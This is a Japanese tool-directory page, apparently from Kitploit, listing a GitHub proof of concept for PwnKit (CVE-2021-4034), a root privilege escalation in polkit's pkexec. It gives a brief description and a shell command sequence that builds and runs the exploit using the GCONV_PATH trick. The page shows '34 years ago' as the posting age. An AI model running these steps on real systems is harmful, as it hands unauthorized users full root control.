Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tw-d/pwnkit-vulnerability_cve-2021-4034
特権昇格脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubtw-d/pwnkit-vulnerability_cve-2021-4034

PwnKit-Vulnerability_CVE-2021-4034

PwnKit - polkit の pkexec で発見されたローカル権限昇格の脆弱性 (CVE-2021-4034)

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
34年前未レビュー

PwnKit 脆弱性 - ローカル権限昇格

  • タイトル: PwnKit 脆弱性 - ローカル権限昇格
  • 対象: Linux
  • カテゴリ: 実行
  • クレジット: Qualys Research Team

説明

Qualys Research Team は、polkit の pkexec におけるメモリ破壊の脆弱性を発見しました。pkexec は、主要なすべての Linux ディストリビューションにデフォルトでインストールされている SUID-root プログラムです。この簡単に悪用可能な脆弱性により、権限のないユーザーは、デフォルト設定の脆弱なホスト上でこの脆弱性を悪用することで、完全な root 権限を取得できます。

PwnKit: polkit の pkexec で発見されたローカル権限昇格の脆弱性 (CVE-2021-4034)

テスト環境

Ubuntu 20.04.3 LTS x86_64

pkexec バージョン 0.105

PoC

root@kitploit:~
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit
ツールをダウンロード